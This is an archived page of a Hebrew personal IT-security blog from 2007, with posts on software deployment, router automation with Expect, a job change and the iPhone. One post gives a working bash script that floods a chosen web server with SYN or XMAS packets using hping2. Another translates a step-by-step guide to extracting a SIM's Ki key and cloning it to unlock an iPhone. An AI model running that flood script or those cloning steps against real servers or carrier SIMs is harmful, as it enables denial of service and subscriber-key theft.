Thursday, August 30, 2007

POC לסקריפט - hping2 DOS

נשאלתי פעמים רבות כיצד ניתן ליצור בדיקות של SYNFLOOD או של התקפות XMAS על שרתים ועל ציודים , אך בעיקר על שרתי WEB שהם האפליקציה הוודאית אשר פתוחה לעולם ולכן בין הקריטיות שיעמדו בעומסי התקפה מסויימים. מובן שכיום רוב מרכות הIPS והFW כבר מס.וגלות לאתר את ההתקפות הללו ולהתמודד איתן בצורה יפה. אבל שוב , ביקשתם קיבלתם

מדובר כמובן על התקפות סופר מיושנות על שכבות התקשורת מול שירותים מסויימים , במקרה הזה נדגים על PORT 80 שהוא מבואת הגישה לפרוטוקול HTTP ( אלא אם שונה ) . לא ארחיב בנוגע לסוגי ההתקפות עצמן - אני יוצא מנקודת הנחה שהן מוכרות.

הסקריפט הבא מתבסס על כלי פשוט בשם HPING אשר מאפשר לייצר פאקטים משל עצמנו. אני בשביל להתכונן לבדיקה שכזו , מוודא גם שהמכונה שלי לא מסוגלת להחזיר ACK ( קצת עבודה עם IPTABLES ) אבל הלוגיקה פשוטה . שוב הכלי הוא POC בלבד , והוכן בשביל להראות לחבר איך נראית התקפה שכזו ומה ההשפעה ( הפלנו באמצעות התקפה עם 10 מחשבים , שרת 2000 לא מוקשח עם IIS5 עליו ).

#!/bin/bash
# note : you need hping2 package installed.
# usage: ./script IP/DOMAIN | METHOD | THREADS
# methods : 1 = synflood | 2 = xmas attack
# example : ./script domain.com 1 50 .
# this will produce a synflood on domain.com with 50 threads
i=1
while [ $i -le $3 ]
do
   if [ $2 -eq 1 ]
   then
     hping2 -S -p 80 $1 & #synflood
   else
     hping2 -X -f -p 80 $1 & #xmas
   fi
   i=`expr $i + 1` #increment counter
done
if [ $1 -eq 0 -a $2 -eq 0 -a $3 -eq 0 ] # use ./script 0 0 0 to kill attack
then
   killall hping2
fi

אין מאחורי המנוע משהו מתוחכם , מדובר בפעולה פשוטה ( ואפילו חובבנית ולא תמיד עובדת ) של סקריפט BASH. היתרון היחסי בדוגמא זו , הא שניתן לבין עד כמה פשוט לייצר כלים או סקריפטים תוצרת בית בכדי לבצע פעולות שונות , אפילו זדוניות - או לחליפין לייצר אוטומציה של תהליכים שכאלו.

Labels: , ,

Sunday, August 26, 2007

ניהול אפליקציה מרכזי

בתור מי שראה חלק ניכר ממערכות המחשוב ברשתות ENT בארץ, הופתעתי לא פעם לגלות שאין פתרון Software Deployment מרכזי אמיתי ללקוחות , פרט לפתרונות הWSUS \ SMS של מיקרוסופט. למרות שאלו פתרונות טובים בנישתם - הם נופלים כאשר מדובר באפליקציות של יצרנים אחרים.

על מה אני בעצם מדבר ומה כל הגישטל... בעצם חישבו על מצב בו ארגון בעל 3000 משתמשים חי וקיים מזה תקופה ( אני מניח שבגודל זה - מעל 10 שנים ). וזה אומר שיש תוכנות המותקנות על כל המחשבים בארגון , החל ממערכת ההפעלה , לתיקוני וטלאי אבטחה שונים . גרסאות שונות ומשונות של תוכנות שונות , ביניהן FLASH . וכמובן תוכנות צד שלישי שהמשתמש התקין עבור עצמו. נדרש פתרון מסויים אשר מאפשר לבצע אחידת בכל הרשת , להסיר גרסאות לא רלוונטיות , לעדכן לגרסאות חדשות מה שצריך , להטליא תוכנות מסויימות וכמובן לבצע מעקב שוטף.

הדבר נראה מעניין יותר כאשר אנו מדברים על חוות שרתים מרוחקות אשר פרוסות בעולם , ויש צורך לבצע עדכוני אבטחה \ אפליקציה ממקום מרוכז וכמובן לוודא שהשרת תמיד נמצא במצב תקין שכזה . במקרים כאלו - הפתרונות הללו נדרשים.

בעצם על מה אני מדבר - Software Deployment \ Asset Managment \ Patching Services מרכזיים אשר מטרתם כמובן לוודא ולקיים ארגון ולאפשר לו להמשיך להתקיים בגדילה וכמובן לשמר על רמת אבטחת מידע , עדכניות אפליקטיבית , אחידות אפליקטיבית , ולשמר ידע אודות שינוי התנהגותי במבנה אפליקטיבי של ארגון.

המערכות הלו בד"כ עובדות בתצורת שרת POLICY מרכזי , עם PROXIES ( במידת הצורך ) פזורים באתרים מרוחקים.. וכמובן CLIENT על כל תחנה , אשר מהווה גורם הדיווח וההפעלה על ידי השרת. אציין גם בצורה שהיא טיפטיפה BIAS , אחד הפתרונות האהובים עליי בתחום זה ומנסיוני איתו כמובן - BigFix אשר נראה מעולה ומבדיקותיי בסביבות מעבדה - נראה בעל התושיה הרבה הביותר . כאשר בין המדדים יש את גישת הLINUX\UNIX\WINDOWS\MAC ולא רק סביבה אחת כמובן.
אגב - ישנם מוצרים רבים בתחום זה , חלקם אפילו תוצרת כחול לבן ( Prefix ) , וישנם גם פתרונות מוכוונים DATACENTER ( כגון OPSWARE ) .

אך כמובן שאת המיד הזה תעקלו כאשר תגיעו לנקודה קריטית - בה תהיה ההבנה שמערכת כזו חוסכת לארגון בן 250 עמדות - 1 איש IT אשר מבצע תמיכה באפליקציה ובתחנות . מאחר ורוב התפעול של פיזור אפליקציה , עדכוני גרסה , ושחזור - יכולים להתבצע ממקום מרכזי.

היופי של מערכות כאלו הוא היכולת למשל להחליף מערכות של שרתי AV ( מערכת BIGFIX למשל יכולה לדבר מול אתרי חברות הAV ולדחוף בעצמה את עדכון הDAT האחרון , ודומים לאלה ... ) ולכן ניתן מיידית לחסוך במשאבים מסויימים ( במצב כזה , שימו את החומרה הכי חלשה בארגון לשרת הAV , רק בכדי שיהיה HEARTBEAT ... אני אישית היית שם אותו על VMWARE )

Labels: , , ,

Thursday, August 23, 2007

רוני חליבה - מנכ"ל אקספון

בתגובה לפרסום היום באתר TheMarker אשר מציין שרוני חליבה ימונה לתפקיד מנכל חברת אקספון , ברצוני להביע את איחולי ההצלחה לרוני. רוני היה בין האנשים הראשונים אשר נתנו לי הזדמנות שווה בקריירה שלי להתקדם ולהוביל כיוונים בתחום אבטחת המידע בארגון גדול. אני רוכש לאדם זה כבוד רב ומאחל לו רק טוב.

בנימה עוד יותר אישית , אני יכול לומר בכנות - מרוני למדתי ניהול מהו.

Labels:

Tuesday, August 21, 2007

אוטומציה למערכות ASP באמצעות Expect

בשנים האחרונות , ובעידן של ריכוז פעילות אצל ספקיות שירותים כדרך הגיונית ופשרת מחירים ותמיכה לשירותים מנוהלים - ישנה מגמה בולטת בהחלט לספקיות שירותים , ובעיקר ספקיות האינטרנט וחברות שר מסוגלות להעמיד מערך אירוח שרתים ומתן תמיכה במודל מיידי - להקים שירותים במודל ASP - ( Application Service Povider ) ובכך בעצם לאפשר מתן של שירותים ללקוחות רבים על גבי פלטפורמה אחת.

בין השירותים שעוברים לאט לאט לעולם הASP אנו יכולים לראות את מודל הHosted UTM FW אשר מפשט עלויות על ידי כך שבקצה הלקוח מונח נתב בלבד, אשר מקשר לתוך VRF אצל הספקית ונגמר בFW שיתופי פרטי , ואז המודל ללקוח הוא בעצם שירות חודשי במקום השקעה בציוד וכח אדם מתחזק. זה נכון גם לגבי MAIL RELAY , שירות SSL VPN ומאוד נפוץ בתחום אירוח האתרים ואפילו החל לתפוס תאוצ בעולם הVOIP. כמובן שאת השירות הוותיק מכולם - תיבת דואר אלקטרוני אצל הספקית , אנו רואים כיום כבר כמובן מאליו ... שירותים רבים מתווספים כיום ואפשר אפילו לראו שירותי EXCHANGE או VMWARE מנוהלים ומשותפים מרחוק.

אחת הבעיות היותר מורכבות בהקמת מערכות ASP הקשורות לאבטחת מידע או בכלל לשירותים מנוהלים ( ואני לא מכניס לכאן את אלמנט הCTO\CSO המבוהל שלוקחים לו את השליטה ומעבירים לספקית ואזהוא מרגיש את הצורך להתגונן כפליים ) הוא הצורך לייצר קונסולידציה בין מערכות לצורכי הגדרה מנוהלים.

הכוונה בעצם היא לכך שכאשר חברה נרשמת לשירות מסויים , בד"כ קליטת ההזמנה מבצעת דרך מערכות CRM למיניהן , שמטייבות עסקאות מול מערכת ERP , ולאחר מכן מעבירות לביצוע חלק ניכר מהפעולות במערכות אוטומטיות . על ידי כך בעצם ירד העומס והדרישות לכח אדם במערכות הBACKOFFICE של הספקיות.

דוגמא מעניינת תהיה למשל ללקוח אשר מעוניין לקבל שירות אנטיספאם עבור דומיין שלו . אז הדרך הנכונה תהיה להעביר את הדומיין לשליטת הספקית והקמת DNS ZONE על גבי מערכות הDNS ( התממשקות ראשונה ) ואז להקים את הדומיין והמדיניות במערכות האנטיספאם ( התממשקות שניה ) ואז להגדיר בחוקי המערכות אפשרות RELAY לדומיין דרך מערכות הספקית ( התממשקות שלישית ) ואז לדבר עם מערכת הIDM של הלקוח בשביל לאפשר למשתמשים שליטה ( התממשקות רביעית ) וכאשר יש לך 5000 - 10000 וכן הלאה לקוחות , המשימה הופכת לעיל בלתי הגיוני . ולכן האוטומציה.

אחת הדרכים שאני אוהב להשתמש בהן היא להקים בעצם מערכת LINUX אשר יודעת לקבל שאילתות ממערכות הERP\CRM ובעצ לתקשר עם המערכות השונות ואז לבצע את הקמת החוקים באופן אוטומטי.
ולאור העובדה שרוב המערכות לASP תומכות SSH ( וזו בד"כ דרישת RFP בעולם הזה ) נהוג לעבוד עם mod_ssh על גבי PERL. אך אני אישית לא אוהב את השיטה הזו - ואני מקווה שאני מכיר לכם משהו חדש פה : Expect Interpeter.

בעצם מערכת EXPECT ( אשר ניתנת להרצה גם על שכבה של WINDOWS ) מאפשרת לנו לעבוד באופן אמיתי כמשתמש וירטואלי על גבי מערכות מרוחקות ולשלוח להן פקודות ומשתנים משלנו. למשל בואו ניקח את שיטת הוספת הניתוב לנתב CISCO ... איך בעצם נוסיף ניתוב ? נבצע את הקוד הבא :

Username: USERNAME
Password: PASSWORD
Router> enable
Router# conf t
Router(conf)# router 1.1.1.1 255.255.255.255 2.2.2.2
Router(conf)# exit
Router# wr mem
Router# exit

למעשה מדובר על רצף פקודות הגיוני , אשר מתחיל בTELNET\SSH לכתובת IP , והמשתנים בו יהיו תמיד שם משתמש , ססמה , כתובת יעד וכתובת מקור. ולכן ניתן ליצור לכך אוטומציה . מה שיבצע SCRIPT של EXPECT יהיה בעצם לצפות לערכים שונים מהפלט של פקודת הSSH או הTELNET ובעצם לזרוק את המשתנה או הפלט הנכון לטרמינל בתגובה - בניגוד לדרך של עבודה עם PROCESS , כאן מדובר על שימוש טבעי בסביבת הTELNET , דוגמא לביצוע מקביל של הפעולה שרצינו בסקריפט של EXPECT ( בלי בדיקת קלט או נכונות וכל מיני פולשטיקים ... ) :

#!/usr/bin/expect -f
#usage : ./script RO_IP RO_USER RO_PASS SRC_IP SRC_MSK DST_IP
set router_ip [lindex $argv 0]
set router_user [lindex $argv 1]
set router_pass [lindex $argv 2]
set data_srcip [lindex $argv 3]
set data_srcmsk[lindex $argv 4]
set data_dstip [lindex $argv 5]
set timeout -1
spawn telnet $router_ip
match_max 1000000
expect "Username:"
send -- "$router_user\r"
expect "Password:"
send -- "$router_pass\r"
expect "> "
send -- "enable\r"
expect "# "
send -- "conf t\r"
send -- "route $data_srcip $data_srcmsk $data_dstip\r"
send -- "exit\r"
send -- "wr mem\r"
send -- "exit\r"
expect eof

ולמה בזבזתי זמן יקר לכתוב כאן את הסקריפט הפשוט הזה ? פשוט בכדי להראות עד כמה פשוט לבצע אוטומציה לתהליכים מול מערכות באמצעות EXPECT ולהוריד משמעותית את הOVERHEAD , שימו לב לקוד - אני בעצם משתמש בידע שלי בהגדר נתב ושולח פקודות טבעיות למול SESSION של TELNET במקרה זה ופשוט בכל פ מצפה לפלט מהקונסול ושולח ערכים משלי. באמצעות שימוש בסקריפטולוגיה מסוג זה , בעצם ניתן להביא למימוש - אוטומציה של תהליכים. מתכנת הסקריפט בסהכ צריך לשבת עם פלט של הגדרה , או עם איש תפעו מערכת ולעקוב אחרי השורות . אגב קיים גם פורט שנקרא AutoExpect שבעצם מקלט סשן חי ואז הופך אותו לסקריפט.

בואו נחשוב על זה , אם יש לנו מערכות כמו FORTIGATE שאנו רוצים להגדיר VDOM עם הגדרות בסיסיות בצורה אוטומטית ולתת לאיש התפעול מסך פשוט וללא טעויות - דרך קלה לביצוע . אותו דבר לגבי הקמה של שירות דואר RELAY לחברה , אותו דבר לגבי בניית רשתות MPLS קטנות ( כי מי ייתן למערכת אוטומטית להגדיר BGP ... ) ורבים אחרים. ניתן לראות הטמעות רבות בארגונים גדולים אשר עצם הקמת משתמש חדש ברשת דורש מעבר על 15 מערכות שונות ( וחלק מכך הוא גם הגדרות בNAC למשל ) אשר ניתן לפשט על ידי קישור פשוט של LOGINSCRIPT ראשוני אשר יגדיר את המשתמש בשאר המערכות השונות בארגון.

אז נכון , יש להיזהר רבות , וCODE REVIEW במבחינת אבטחת מידע הוא קריטי, כמו גם דרך העברת CREDENTIALS לסקריפט ( שאגב נהוג לא לשמור במערכות אלו , אלא לקחת אותו בכל הרצה כקלט ולתשאל עבורו ) אבל בהחלט מדובר על דרך הגיונית ולגיטימית לבנות מערכות LARGE-SCALE תוך שמירה על מינימום מגע אנושי בתהליך , ומקסימום יעילות.

Labels: , , ,

Sunday, August 19, 2007

הiPhone פרוץ רשמית - SIM Hack

אני יודע , רציתי לתת לפוסט הקודם לשקוע כמה ימים לפני שאני מפרסם - אבל את הידיעה הזו אני לא יכול לדחות ואפילו לא בשעה. הIPHONE ידידיי , נפרץ!.

[ פוסט זה הינו למטרת לימוד בלבד , המידע המצוין בו נלקח ונאסף ממקורות מידע חיצוניים , אין כל כוונה לפגוע בזכות יוצרים או קניין וכדומה ... בקיצור - הכל למטרת ידיעה ולימוד בלבד , כמו כן מטרת הכתיבה היא להביא את המידע לציבור קוראי העברית ]

המשמעות היא פשוטה מאוד - משתמש בארץ יכול לקנות IPHONE באתר של APPLE , להרכיב עליו את העברית שפותחה לו ( נסו למשל בhandy.co.il ) ואז באמצעות כלים חובבניים לייצר SIM אשר מחקה את הSIM של AT&T וליצור את מה שמכונה SuperSIM שהוא בעצם SIM צרוב על גבי Silvercard אשר מכיל את פרטי הCarrier שלכם ( למשל סלקום או אורנג' ) יחד עם הפרטים המזהים של IMEI יחד עם KI של רשתות הסלולר.

מה שהופך את התהליך למורכב הוא - שמדובר בכתיבת SIM תוצרת בית , ולא הפעלה של CRACK על המכשיר כפי שכולם קיוו שיהיה ( אולי זה עוד יגיע ) ולכן לא מתאים לביצוע כל אחד - אבל אני מניח שבשבועות הקרובים , נוכל כבר למצוא כל מיני אושיות שיבצעו תמורת תשלום סמלי את הפריצה. אגב , מעניין איך יגיבו הספקיות הישראליות לכך.

בגדול ומאוד בHIGHLEVEL מדריך פריצה :
( שימו לב , לצרכי לימוד בלבד וכ POC ! ובנוסף עיברתתי ממדריך קיים שנמצא כאן )

דרישות קדם :
1. קנו IPHONE [ ותקנו גם לי אחד ] :-)
2. לפי הנתונים שהצלחתי לגרד - נכון להיום צריך שהSIM של הספקית יהיה מסוג COMP128V1 ( לא בדקתי אם אנחנו עומדים בזה בארץ )
3. מכשיר לצריבת SIM ( יש בשפע באינטרנט - אחד הטובים יותר הוא Infinity USB Unlimited )4. SilverCard שהוא בעצם SIM ריק לצריבה
5. יש להוריד את הקבצים הבאים : SIM_EMU_6.01_CFG_v2.1.zip wst109_865.rar SIM_EMU_6.01_iphone_u1.rar

הוצאת פרטים מהSIM של הספקית
1. הכנס את הSIM של הספקית למכשיר הצריבה
2. הפעל את WoronScan ( הקובץ השני שהורדת )
3. בצע פעולות "IMSI select" וגם את "ICC select" ורשום את המספרים בצד
4. בצע פעולת "Ki search" ( חשוב לדעת שפעולה זו עשויה לארוך חצי שעה ויותר )

הוצאת פרטים מהSIM של AT&T
1. הכנס את הSIM שקיבלת עם המכשיר
2. בצע פעולת "IMSI select"

כעת יש ברשותינו כל המידע הנחוץ בכדי להכין את הSuperSIM

הכנת הSUPESIM
1. פרוש את קובץ ה "SIM_EMU_6.01_iphone_u1.rar" שהורדת
2. הכנס את הSilverCard לצורב הSIM.
3. הפעל את SIM-EMU 6.01 Configurator v2.1 ועבור לטאב Configure
4. לחץ Read From Disk
5. עבור לתיקיה אליה הורדו הקבצים ( ונפרשו ) בסדר הבא :
- הקובץ SIM_EMU_6.01_iphone_u1.HEX
- הקובץ SIM_EMU_6.01_iphone_u1_EP.HEX
6. בחרו בPosition 0 והכניסו את המידע מהSIM של הספקית שרשמתם קודם בצד
תחת ADN/SMS/FDN# יש לסמן - 161,15,4 ( ארבע אחרון ) ותחת SMS Centre את כתובת
ספקית הSMS ממכשיר קיים שלכם אצל הספקית ( בנוקיה קל מאוד להוציא את המידע )
7. בחרו בPosition 9 והכניסו את הIMSI מתוך הSIM של AT&T, וכמובן PIN1,PUK1 כפי
שנרשם בPosition 0 ( ושום דבר אחר ! )
8. תחת Config Mode בחרו Files
9. לחצו על Write To Disk ( תישאלו האם לייצר SuperSim ) , שימרו לדיסק.הע
10. צירבו באמצעות צורב הSIM את הכרטיס החדש שלכם.

לינקים חשובים
1. המדריך המקורי שתרגמתי ( שימו לב , שווה להתעדכן - בטוח יהיו שינויים )
2. מדריך חתיכת SIM
3. מדריך הפעלה דרך WINDOWS
4. המדריך המעודכן והמדוייק ביותר עד כה נמצא כאן

אגב , החברה Infinity USB מוכרת את מכשיר הצריבה תמורת 70 יורו , וכל כרטיס SILVERSIM תמורת 10 יורו נוספים ... כך שיש עלות לא שולית כאן של כ600 שקלים עבור ציוד שלא בטוח שתצטרכו יותר לאחר ביצוע הפעולה הנ"ל ( אלא אם כן אתם מפתחים מערכות רלוונטיות ).

אגב , אם אתם רוצים "לראות בעיניים" יש את הסרטון החביב הבא בYouTube .

Labels: ,

Friday, August 17, 2007

סופה של תקופה - פרשתי מבזק בינלאומי

חשבתי במשך זמן מה אם אכתוב על זה או לא , ולאחר התייעצות בכמה מחבריי הטובים החלטתי שכן לכתוב . בכל זאת מדובר בשינוי די משמעותי בחיי הפרטיים והמקצועיים. אני מקווה שזה גם יסביר מדוע איבדתי את קול הבלוגר שלי למשך כמעט שבועיים ... היה לי הרבה חשבון נפש לעשות עם עצמי , ולכן העדפתי לחכות קצת .

החל מתאריך ה22 לאוגוסט 2007 , איני מועסק יותר בחברת בזק בינלאומי , הודעתי לפני כחודש על כוונתי לפרוש , ואכן כך עשיתי. אני מתנצל בפני אלו שקוראים ושואלים עצמם - איך הוא לא סיפר לי עד עכשיו ... ככה , וככה זו כן תשובה.

עברתי בבזק בינלאומי תקופות יפות יותר ויפות פחות במהלך 3 שנות העסקתי שם ,ואני מסיים בתפקיד מהנדס אבטחת המידע הבכיר בחברה. ומקווה שימשיכו לפרוח כפי שפרחו בתקופה זו , שכן בזק בינלאומי הייתה לי כבית במשך כל התקופה. בזק בינלאומי היא מקום מדהים שחשף אותי לפעילויות רבות ואיפשר לי להתפתח הן בתחום העסקי , הן בתחום הייעוץ והטכנולוגיה והן בתחום הארכיטקטורה המערכתית. נהניתי להקים בחברה זו את פעילות אבטחת המידע ללקוחות בעזרה מהממונים וכמובן מהחברה כולה באופן רוחבי , הוכחנו שאפשר לייצר פעילות באמצעות ידע , ואני מודה באופן אישי למנהלי השונים אשר נתנו בי אמון וחופש פעולה ללכת לכיוונים שראיתי לנכונים - ואני מקווה שהתמורה הייתה במקומה.

זה הזמן לחקור כיוונים חדשים וטכנולוגיה חדשה , אני אעדכן אתכם , כי כרגע הכל סודי כמו שאני אוהב... אבל אף אחד לא עוזב מקום שהוא אוהב בלי קלף אחד או שניים בשרוול.

לגבי ההמשך - בהחלט עלו שאלות ברובו של עניין על מה מעניין אותי נכון לשנים הקרובות והכיוון בקריירה , האם תחום הארכיטקטורה , ההנדסה , הייעוץ והאם השילוב ביניהם אפשרי בתחום אבטחת המידע כאשר נשארים בכותלי מדינת ישראל , עם מגבלות עסקיות ותפעוליות הנובעות בעיקר בשל גודלו של ארגון.

אגב , הערה במקום תהיה להגיד שהדבר הכי מצחיק ומשעשע בחודש האחרון הוא השמועות המטורפות שרצות לגבי הכיוון שאליו אני פונה , לאן אני הולך , למה עזבתי וכדומה , חלק מהשמועות גובלות בפלילי... כמובן , רק שמועות - אבל זה בהחלט מעביר לי את הזמן בכיף

מה שכן , עכשיו יהיה לי יותר זמן לכתוב

ודבר אחד חשוב לי אליכם , לכל אלו שמחכים להזדמנות שתבוא ונעצרים , את המשפט הבא אוכל לבטא רק באנגלית , וזה כדי לשמור על כוחו - זיכרו תמיד -
Its Better To Crash And Burn , Than To Fade Away ...


בארי.

Labels: , ,

Thursday, August 02, 2007

הPDA המושלם - iPhone

בואו נגיד שאתם כמוני , ובואו נגיד שלהיות כמוני זה אומר להזיל ריר על מכשור מהפכני עד שהוא מגיע לידיים שלכם , זה אומר שאתם בניגוד אליי , כבר מיובשים . למה בניגוד אליי ? כי אני חוויתי סוף כל סוף את המכשיר המדהים הזה!. ותודה וסליחה לדייויד ממן. למה תודה - כי הוא נתן לי להשתמש בפלא הזה , למה סליחה ? כי אני מתכוון לשדוד אותו באישון לילה בלי להסתכל אחורה בכלל. המכשיר מדהים.

טוב אחרי שנתתי פתיחה קלה ... היום בשעות הבוקר השתתפתי באירוע הדרכה במשרדי חברת TREKIT המצויינים. ההדרכה , שאני מניח שהייתה רלוונטית לחלק גדול מהנוכחים , לא הייתה העניין הגדול מבחינתי - העניין היה כמובן לבוא ולפגוש חברים טובים - כמו יניב ברזילי , מנכ"ל TREKIT, דייויד ממן חברי הטוב ומהנדס המערכות הבכיר של FORTINET בארץ , ועוד מספר אנשים חשובים. ( אגב , גיא מזרחי מתחבא מתחת לאייפון ). בערך כצי שעה אחרי שהגעתי ועוד לפני שהגיעו הרבה אנשים , אמר לי דייויד - רוצה להתאוורר ? קח משהו לדרך ... ושלף את הצעצוע הכסוף-שחור הזה. חברים - התמכרתי.

בכל שנותיי כאיש מחשבים , כאיש תוכנה וכטכנולוג , לא ראיתי מוצר כלכך מדהים ששובר את כל המוסכמות לגבי מכשור נייד. ובשל כך שהמכשיר עדין לא עובד בארץ בגלל חסימת הSIM , יכולתי לבדוק אותו רק כנגן מדיה וכPDA. ולא סתם PDA - הPDA המושלם ! ולמה אני אומר את זה ...

1. למכשיר יש את המסך הכי טוב שראיתי למכשיר נייד , וזה כולל את המחשב הנייד שלי שיש לו מסך מדהים , וכולל לדעתי את מסך הLCD שיש לי בבית.
2. שליטה חסרת תקדים של זיהוי יותר מאצבע אחת על המסך , ובידוד מגע ועל ידי כך יצירת מקלדת מגע מושלמת ללא צורך במצביע כגון STYLUS על סוגיהם.
3. קישוריות אלחוטית מעולה ופשוטה אשר מתממשקת לכלל המערכות ולכן רלוונטית לכל ווידג'ט שניתן להתקין על המערכת.
4. במכשיר יש ג'ירוסקופ שמזהה זווית עבודה ולכן משנה תצוגה בהתאם לסיבוב המכשיר בצורה פיזית. נראה אתכם נוקיה.
5. נגן הMP3 המושלם , באמת המושלם - אין לי שום דרך אחרת להגדיר.
6. מערכת ניהול יומן , סנכרון דרך ACTIVESYNC למערכות הדואר ותמיכה בכל סטנדרט מקובל הופכים את המכשיר הזה לPDA המושלם.

בואו ניגש אל מול כל הטענות. מיקרוסופט , לאחר שנים רבות ומספר רב של גרסאות לWINDOWS MOBILE , עדיין מספקים סחורה נחותה יחסית אשר אינה מתקרבת לסביבה האמיתית שלהם. לעומתם - APPLE בגרסה ראשונה - בום ! פשוט עושים מהפכה , מערכת ההפעלה שרצה לכם על הMAC ממש רצה על הסלולרי , באיכות וזריזות מדהימה , רזולוציה מושלמת. מה עוד שלעומת כל מכשיר אחר המאפשר גלישה - פה יש לנו ממש PORT של הדפדפן המעולה SAFARI של אפלי שמאפשר צפיה במכשיר בדפים ממש כמו במכשיר רגיל.

מה שמעניין הוא שבגלל העיצוב הנקי והדק של המכשיר , ממש קל להתרגל אליו , לגלוש בו , לקרוא חומר ממסך ארוך ( בזמן ההרצאה הספקתי לקרוא מיילים בGMAIL מהמכשיר ) ולכן יש לנו עכשיו חלופה אמיתית למחשב נייד , ולאיש העסקים אשר נדרש לגישה לאינטרנט מכלמקום , אבל לא ממש צריך כלים מתקדמים יותר , למרות שאני בטוח שגם הם יהיו שם בהמשך - בנתיים יש את הכלים של גוגל - שבעיני מספקים לסביבה הפשוטה.

פשוט חוויה מתקנת , אני רוצה כזה , לוריד , ועכשיו ! חכו להמשך , אני אעשה עכשיו הכל בכדי להשים ידיים על צעצוע כזה .

קצת על התמונה למעלה - אני משחק עם הIPHONE בזמן שהגורו שלי - דייויד ממן - מרצה על גרסה MR5 של מוצר אבטחת המידע - הFORTINET FORTIOS 3.0. והנה הקשר של הפוסט הזה לאבטחת מידע. התמונה צולמה עם מכשיר הנוקיה 6280 שלי שכפי שהבנתם - לא יחיה אצלי עוד הרבה.

Labels: ,


About

    My Name is Barry Shteiman, im a devoted tech junkie, and this is my blog.
    E: barry.shteiman -at- gmail.com
    Twitter : bshteiman

Tags & Categories

Mailing List & RSS

Stay Updated  
Add to Technorati Favorites